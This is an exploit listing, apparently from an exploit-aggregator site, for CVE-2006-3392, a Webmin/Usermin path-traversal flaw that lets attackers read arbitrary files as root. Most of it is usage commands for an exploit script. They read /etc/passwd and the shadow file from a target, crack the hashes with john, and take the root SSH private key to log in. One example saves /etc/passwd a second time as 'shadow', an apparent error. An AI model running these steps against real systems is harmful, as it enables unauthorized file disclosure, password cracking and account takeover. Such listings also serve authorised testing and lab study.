## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-G1VI-CVE-2006-3392
# CVE-2006-3392
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin версий до 1.290 и Usermin версий до 1.220 вызывают функцию simplify_path до декодирования HTML, что позволяет удалённым злоумышленникам читать произвольные файлы, как показано на примере использования последовательностей "..%01", которые обходят удаление последовательностей "../" до того, как байты, такие как "%01", удаляются из имени файла. ПРИМЕЧАНИЕ: Это другая проблема, нежели CVE-2006-3274.
### Использование
Просмотр любого файла в файловой системе с правами root
root@kitploit:~
./exploit.sh <target ip> <target port> <file to disclose>
### Примеры
Просмотр файлов passwd и shadow на 10.10.11.105, объединение (unshadow) и взлом хэшей
root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
Просмотр закрытого ключа RSA на 10.10.11.105
root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key some-email@example.com